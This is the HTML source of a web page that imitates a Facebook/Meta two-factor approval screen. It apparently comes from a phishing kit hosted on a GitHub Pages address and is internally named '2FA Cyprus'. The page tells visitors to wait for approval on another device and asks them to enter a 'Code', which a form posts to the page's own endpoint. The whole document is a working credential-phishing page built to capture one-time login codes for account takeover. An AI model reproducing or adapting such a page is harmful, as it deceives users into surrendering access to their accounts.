<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <!--05973803-4d7e-48b8-a336-9ff68a6f0c81 a-->


    	<title>Meta | Facebook</title>
    <meta name="keywords" content="">
    <meta name="description" content="">
<link data-default-icon="https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico" data-badged-icon="https://static.xx.fbcdn.net/rsrc.php/yD/r/UJj0tgk-RrT.ico" rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yT/r/aGT3gskzWBf.ico">

    

</head><body class="lp-pom-body"><br>
    

    <br><br><meta name="viewport" content="initial-scale=1.0, width=device-width, user-scalable=yes"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="lp-version" content="v6.24.183"><style title="page-styles" type="text/css" data-page-type="main_desktop">
body {
 color:#000;
}
a {
 color:#0000ff;
 text-decoration:none;
}
#lp-pom-root {
 display:block;
 background:rgba(238,238,238,1);
 border-style:none;
 margin:auto;
 padding-top:0px;
 border-radius:0px;
 min-width:760px;
 height:958px;
}
#lp-pom-block-11 {
 display:block;
 background:rgba(237,246,255,1);
 border-style:none;
 margin-left:auto;
 margin-right:auto;
 margin-bottom:0px;
 border-radius:0px;
 width:100%;
 height:958px;
 position:relative;
}
#lp-pom-image-14 {
 display:block;
 background:rgba(255,255,255,0);
 left:67px;
 top:169px;
 z-index:1;
 position:absolute;
}
#lp-pom-text-15 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:67px;
 top:60px;
 z-index:2;
 width:300px;
 height:22px;
 transform:none;
 transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-16 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:67px;
 top:87px;
 z-index:3;
 width:537px;
 height:25px;
 transform:none;
 transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-17 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:67px;
 top:112px;
 z-index:4;
 width:635px;
 height:48px;
 transform:none;
 transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-18 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:137px;
 top:464px;
 z-index:5;
 width:225px;
 height:22px;
 transform:none;
 transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-19 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:136px;
 top:493px;
 z-index:6;
 width:555px;
 height:48px;
 transform:none;
 transform-origin:0 0;
 position:absolute;
}
#lp-pom-image-20 {
 display:block;
 background:rgba(255,255,255,0);
 left:104px;
 top:471px;
 z-index:7;
 position:absolute;
}
#lp-pom-button-22 {
 display:block;
 border-style:none;
 border-radius:17px;
 left:0px;
 top:58px;
 z-index:9;
 width:598px;
 height:43px;
 position:absolute;
 background:rgba(63,141,243,1);
 box-shadow:none;
 text-shadow:none;
 color:#fff;
 border-width:undefinedpx;
 border-color:#undefined;
 font-size:20px;
 line-height:24px;
 font-weight:400;
 font-family:Arial, sans-serif;
 font-style:normal;
 text-align:center;
 background-repeat:no-repeat;
}
#lp-pom-root .lp-positioned-content {
 top:0px;
 width:760px;
 margin-left:-380px;
}
#lp-pom-block-11 .lp-pom-block-content {
 margin-left:auto;
 margin-right:auto;
 width:760px;
 height:958px;
}
#lp-pom-image-14 .lp-pom-image-container {
 border-style:none;
 border-radius:0px;
 width:635px;
 height:275px;
}
#lp-pom-image-14 .lp-pom-image-container img {
 width:635px;
 height:275px;
}
#lp-pom-image-20 .lp-pom-image-container {
 border-style:none;
 border-radius:0px;
 width:28px;
 height:28px;
}
#lp-pom-image-20 .lp-pom-image-container img {
 width:28px;
 height:28px;
}
#container_number {
 position:absolute;
 top:0px;
 left:0px;
 width:598px;
 height:47px;
}
.lp-pom-form-field .ub-input-item.single.form_elem_number {
 position:absolute;
 top:0px;
 left:0px;
 width:598px;
 height:47px;
}
#lp-pom-button-22:hover {
 background:rgba(48,119,231,1);
 box-shadow:none;
 color:#fff;
}
#lp-pom-button-22:active {
 background:rgba(40,105,219,1);
 box-shadow:none;
 color:#fff;
}
#lp-pom-button-22 .label {
 margin-top:-12px;
}
#lp-pom-root-color-overlay {
 position:absolute;
 background:none;
 top:0;
 width:100%;
 height:958px;
 min-height:100%;
}
#lp-pom-block-11-color-overlay {
 position:absolute;
 background:none;
 height:958px;
 width:100%;;
}
#lp-pom-form-21 {
 display:block;
 left:93px;
 top:559px;
 z-index:8;
 width:598px;
 height:0px;
 position:absolute;
}
#lp-pom-form-21 .fields {
 transform:none;
 transform-origin:0 0;
 width:0;
}
#lp-pom-form-21 .lp-pom-form-field {
 position:absolute;
}
#lp-pom-form-21 .option {
 position:absolute;
}
#lp-pom-form-21 .optionsList {
 position:absolute;
}
#lp-pom-form-21 .lp-pom-form-field .single {
 height:47px;
 font-size:18px;
 line-height:18px;
 padding-left:13px;
 padding-right:13px;
 flex:1;
}
#lp-pom-form-21 .lp-pom-form-field select {
 height:45px;
}
#lp-pom-form-21 .lp-pom-form-field .form_elem_multi {
 padding-top:13px;
 padding-bottom:14px;
}
#lp-pom-form-21 .lp-pom-form-field .lp-form-label {
 font-family:arial;
 font-weight:400;
 font-size:14px;
 line-height:15px;
 color:#000;
 display:block;
 margin-bottom:4px;
 width:auto;
 margin-right:0px;
}
#lp-pom-form-21 .lp-pom-form-field .lp-form-label .label-style {
 font-weight:bolder;
 font-style:inherit;
}
#lp-pom-form-21 .lp-pom-form-field input[type=text], #lp-pom-form-21 .lp-pom-form-field input[type=email], #lp-pom-form-21 .lp-pom-form-field input[type=tel], #lp-pom-form-21 .lp-pom-form-field textarea, #lp-pom-form-21 .lp-pom-form-field select {
 border-style:solid;
 border-width:1px;
 border-color:#bbbbbb;
}
#lp-pom-form-21 .lp-pom-form-field .opt-label {
 font-family:arial;
 font-weight:400;
 font-size:13px;
 color:#000;
 line-height:15px;
}
#lp-pom-form-21 .lp-pom-form-field .opt-label .label-style {
 font-weight:inherit;
 font-style:inherit;
}
#lp-pom-form-21 .lp-pom-form-field .text {
 background-color:#fff;
 color:#000;
 border-radius:11px;
}
</style><style title="page-styles" type="text/css" data-page-type="main_mobile">
@media only screen and (max-width: 600px) {
#lp-pom-root {
 display:block;
 background:rgba(238,238,238,1);
 border-style:none;
 margin:auto;
 padding-top:0px;
 border-radius:0px;
 min-width:320px;
 height:819px;
}
#lp-pom-block-11 {
 display:block;
 background:rgba(237,246,255,1);
 border-style:none;
 margin-left:auto;
 margin-right:auto;
 margin-bottom:0px;
 border-radius:0px;
 width:100%;
 height:819px;
 position:relative;
}
#lp-pom-image-14 {
 display:block;
 background:rgba(255,255,255,0);
 left:-40px;
 top:188px;
 z-index:1;
 position:absolute;
}
#lp-pom-text-15 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:-39px;
 top:62px;
 z-index:2;
 width:300px;
 height:22px;
 transform:scale(0.84);
 transform-origin:0 0;
 -webkit-transform:scale(0.84);
 -webkit-transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-16 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:-40px;
 top:88px;
 z-index:3;
 width:537px;
 height:25px;
 transform:scale(0.8);
 transform-origin:0 0;
 -webkit-transform:scale(0.8);
 -webkit-transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-17 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:-40px;
 top:114px;
 z-index:4;
 width:445px;
 height:72px;
 transform:scale(0.9);
 transform-origin:0 0;
 -webkit-transform:scale(0.9);
 -webkit-transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-18 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:10px;
 top:380px;
 z-index:5;
 width:225px;
 height:22px;
 transform:scale(1.03);
 transform-origin:0 0;
 -webkit-transform:scale(1.03);
 -webkit-transform-origin:0 0;
 position:absolute;
}
#lp-pom-text-19 {
 display:block;
 background:rgba(255,255,255,0);
 border-style:none;
 border-radius:0px;
 left:9px;
 top:406px;
 z-index:6;
 width:360px;
 height:48px;
 transform:scale(0.9);
 transform-origin:0 0;
 -webkit-transform:scale(0.9);
 -webkit-transform-origin:0 0;
 position:absolute;
}
#lp-pom-image-20 {
 display:block;
 background:rgba(255,255,255,0);
 left:-16px;
 top:383px;
 z-index:7;
 position:absolute;
}
#lp-pom-button-22 {
 display:block;
 border-style:none;
 border-radius:13px;
 left:0px;
 top:50px;
 z-index:9;
 width:368px;
 height:41px;
 position:absolute;
 background:rgba(63,141,243,1);
 box-shadow:none;
 text-shadow:none;
 color:#fff;
 border-width:undefinedpx;
 border-color:#undefined;
 font-size:20px;
 line-height:24px;
 font-weight:400;
 font-family:Arial, sans-serif;
 font-style:normal;
 text-align:center;
 background-repeat:no-repeat;
}
body {
 color:#000;
}
a {
 color:#0000ff;
 text-decoration:none;
}
#lp-pom-root .lp-positioned-content {
 top:0px;
 width:320px;
 margin-left:-160px;
}
#lp-pom-block-11 .lp-pom-block-content {
 margin-left:auto;
 margin-right:auto;
 width:320px;
 height:819px;
}
#lp-pom-image-14 .lp-pom-image-container {
 border-style:none;
 border-radius:0px;
 width:404px;
 height:176px;
}
#lp-pom-image-14 .lp-pom-image-container img {
 width:404px;
 height:176px;
}
#lp-pom-image-20 .lp-pom-image-container {
 border-style:none;
 border-radius:0px;
 width:23px;
 height:23px;
}
#lp-pom-image-20 .lp-pom-image-container img {
 width:23px;
 height:23px;
}
#container_number {
 position:absolute;
 top:0px;
 left:0px;
 width:368px;
 height:41px;
}
.lp-pom-form-field .ub-input-item.single.form_elem_number {
 position:absolute;
 top:0px;
 left:0px;
 width:368px;
 height:41px;
}
#lp-pom-button-22:hover {
 background:rgba(48,119,231,1);
 box-shadow:none;
 color:#fff;
}
#lp-pom-button-22:active {
 background:rgba(40,105,219,1);
 box-shadow:none;
 color:#fff;
}
#lp-pom-button-22 .label {
 margin-top:-12px;
}
#lp-pom-root-color-overlay {
 position:absolute;
 background:none;
 top:0;
 width:100%;
 height:819px;
 min-height:100%;
}
#lp-pom-block-11-color-overlay {
 position:absolute;
 background:none;
 height:819px;
 width:100%;;
}
#lp-pom-form-21 {
 display:block;
 left:-24px;
 top:467px;
 z-index:8;
 width:368px;
 height:0px;
 position:absolute;
}
#lp-pom-form-21 .fields {
 transform:none;
 transform-origin:0 0;
 width:0;
}
#lp-pom-form-21 .lp-pom-form-field {
 position:absolute;
}
#lp-pom-form-21 .option {
 position:absolute;
}
#lp-pom-form-21 .optionsList {
 position:absolute;
}
#lp-pom-form-21 .lp-pom-form-field .single {
 height:41px;
 font-size:20px;
 line-height:20px;
 padding-left:9px;
 padding-right:9px;
 flex:1;
}
#lp-pom-form-21 .lp-pom-form-field select {
 height:39px;
}
#lp-pom-form-21 .lp-pom-form-field .form_elem_multi {
 padding-top:9px;
 padding-bottom:10px;
}
#lp-pom-form-21 .lp-pom-form-field .lp-form-label {
 font-family:arial;
 font-weight:400;
 font-size:14px;
 line-height:15px;
 color:#000;
 display:block;
 margin-bottom:4px;
 width:auto;
 margin-right:0px;
}
#lp-pom-form-21 .lp-pom-form-field .lp-form-label .label-style {
 font-weight:bolder;
 font-style:inherit;
}
#lp-pom-form-21 .lp-pom-form-field input[type=text], #lp-pom-form-21 .lp-pom-form-field input[type=email], #lp-pom-form-21 .lp-pom-form-field input[type=tel], #lp-pom-form-21 .lp-pom-form-field textarea, #lp-pom-form-21 .lp-pom-form-field select {
 border-style:solid;
 border-width:1px;
 border-color:#bbbbbb;
}
#lp-pom-form-21 .lp-pom-form-field .opt-label {
 font-family:arial;
 font-weight:400;
 font-size:21px;
 color:#000;
 line-height:24px;
}
#lp-pom-form-21 .lp-pom-form-field .opt-label .label-style {
 font-weight:inherit;
 font-style:inherit;
}
#lp-pom-form-21 .lp-pom-form-field .text {
 background-color:#fff;
 color:#000;
 border-radius:10px;
}
}
</style><!-- lp:insertions start head --><link href="https://builder-assets.unbounce.com/published-css/main-ebbfc5e.z.css" rel="stylesheet" media="screen" type="text/css"><meta property="og:title" content=""><script type="text/javascript">window.ub = {"page":{"id":"05973803-4d7e-48b8-a336-9ff68a6f0c81","variantId":"a","usedAs":"main","name":"2FA Cyprus","url":"https://managecenter-pages.github.io/business004389789/","dimensions":{"breakpoints":["desktop","mobile"],"desktop":{"height":958,"width":760},"mobile":{"height":819,"width":320},"mobileMaxWidth":600}},"hooks":{"beforeFormSubmit":[],"afterFormSubmit":[]}};</script><script type="text/javascript">window.ub.form={"action":"modal","validationRules":{"number":{"required":true,"phone":false}},"validationMessages":{"number":{}},"customValidators":{},"url":"a-form_confirmation.html","lightboxSize":{"desktop":{"height":180,"width":512},"mobile":{"height":180,"width":240}},"isConversionGoal":true};window.module={lp:{form:{data:window.ub.form}}};</script><!-- lp:insertions end head -->
<script>window.ub=window.ub||{};window.ub.captcha=window.ub.captcha||{};window.ub.visitorId="6211f561-84bb-4e91-9c46-c316e59f222a";window.ub.routingStrategy="single";window.ub.contentRoutingStrategy="single";window.ub.domain={};</script>
<script async="" src="https://netcentermanage.ubpages.com/_ub/static/ts/786ffa188154a7a81202c5d108dc70f1e0214262.js"></script>
<link type="text/css" rel="stylesheet" href="blob:https://managecenter-pages.github.io/0dd0a646-0aa8-4e08-8e4e-b92e4c37fe8b"><style type="text/css">@media only screen and (max-width: 480px), only screen and (max-device-width: 480px) {* {-webkit-text-size-adjust: none;}}</style>
    <!-- lp:insertions start body:before --><!-- lp:insertions end body:before -->

    

<div class="lp-element lp-pom-root" id="lp-pom-root"><div id="lp-pom-root-color-overlay"></div><div class="lp-positioned-content"><div class="lp-element lp-pom-image" id="lp-pom-image-14"><div class="lp-pom-image-container" style="overflow: hidden;"><img srcset="" data-src-mobile-2x="https://www.facebook.com/images/assets_DO_NOT_HARDCODE/fb_company_illo/ACP-UnifiedDelta-Device-Mobile_light-3x.png" data-src-mobile-1x="https://www.facebook.com/images/assets_DO_NOT_HARDCODE/fb_company_illo/ACP-UnifiedDelta-Device-Mobile_light-3x.png" data-src-desktop-1x="https://www.facebook.com/images/assets_DO_NOT_HARDCODE/fb_company_illo/ACP-UnifiedDelta-Device-Mobile_light-3x.png" alt="" src="https://www.facebook.com/images/assets_DO_NOT_HARDCODE/fb_company_illo/ACP-UnifiedDelta-Device-Mobile_light-3x.png"></div></div><div class="lp-element lp-pom-text nlh" id="lp-pom-text-15" style="height: auto;"><p><span style="font-size: 18px;">• Facebook</span></p></div><div class="lp-element lp-pom-text nlh" id="lp-pom-text-16" style="height: auto;"><h2 dir="auto">Check your notifications on another device
</h2></div>
<div class="lp-element lp-pom-text nlh" id="lp-pom-text-17" style="height: auto;"><p style="line-height: 24px;"><span style="font-size: 16px;">Go to your Facebook account on another device and open the notification we sent to approve this connection.<br></span></p></div><div class="lp-element lp-pom-text nlh" id="lp-pom-text-18" style="height: auto;"><p><span style="font-size: 16px;">Waiting for approval</span></p></div><div class="lp-element lp-pom-text nlh" id="lp-pom-text-19" style="height: auto;"><p style="line-height: 24px;"><span style="font-size: 16px;">It may take a few minutes to get the notification on your other device.
&nbsp;</span></p></div><div class="lp-element lp-pom-image" id="lp-pom-image-20"><div class="lp-pom-image-container" style="overflow: hidden;"><img src="/business004389789/1oi8fnz-photo-2024-04-18-23-11-45_100000000000000000001o.jpg" alt="" data-src-desktop-1x="/business004389789/1oi8fnz-photo-2024-04-18-23-11-45_100000000000000000001o.jpg" data-src-mobile-1x="/business004389789/1oi8fnz-photo-2024-04-18-23-11-45_100n00n00000000000001o.jpg" data-src-mobile-2x="/business004389789/1oi8fnz-photo-2024-04-18-23-11-45_100000000000000000001o.jpg" srcset=""></div></div><div class="lp-element lp-pom-form has-axis" id="lp-pom-form-21"><form action="/fsg?pageId=05973803-4d7e-48b8-a336-9ff68a6f0c81&amp;variant=a" method="POST"><input type="hidden" name="pageId" value="05973803-4d7e-48b8-a336-9ff68a6f0c81"><input type="hidden" name="pageVariant" value="a"><div class="fields"><div class="lp-pom-form-field single-line-text" id="container_number"><input id="number" name="number" type="tel" class="ub-input-item single text form_elem_number" placeholder="Code" required=""></div></div><button class="lp-element lp-pom-button" id="lp-pom-button-22" type="submit"><span class="label"><strong>Continue</strong></span></button></form></div></div><div class="lp-element lp-pom-block" id="lp-pom-block-11"><div id="lp-pom-block-11-color-overlay"></div><div class="lp-pom-block-content"></div></div></div><!-- lp:insertions start body:after --><!-- animation-observer -->
<script>(()=> { 
  const obs = new IntersectionObserver(
    ents => {ents.forEach(e => {
        if (e.isIntersecting) {
          e.target.classList.add('ub-ani-play');
        } else {
          e.target.classList.remove('ub-ani-play');
        }
      });}, {threshold: 0.5}
  );
  const els = document.querySelectorAll('[class*="ub-ani"]');
  els.forEach(el => obs.observe(el));
 })();
</script><script async="" src="https://builder-assets.unbounce.com/published-js/main.bundle-f4428e5.z.js" type="text/javascript"></script><!-- lp:insertions end body:after -->

<div class="backdrop__3tG5Hl"></div>
</body></html>
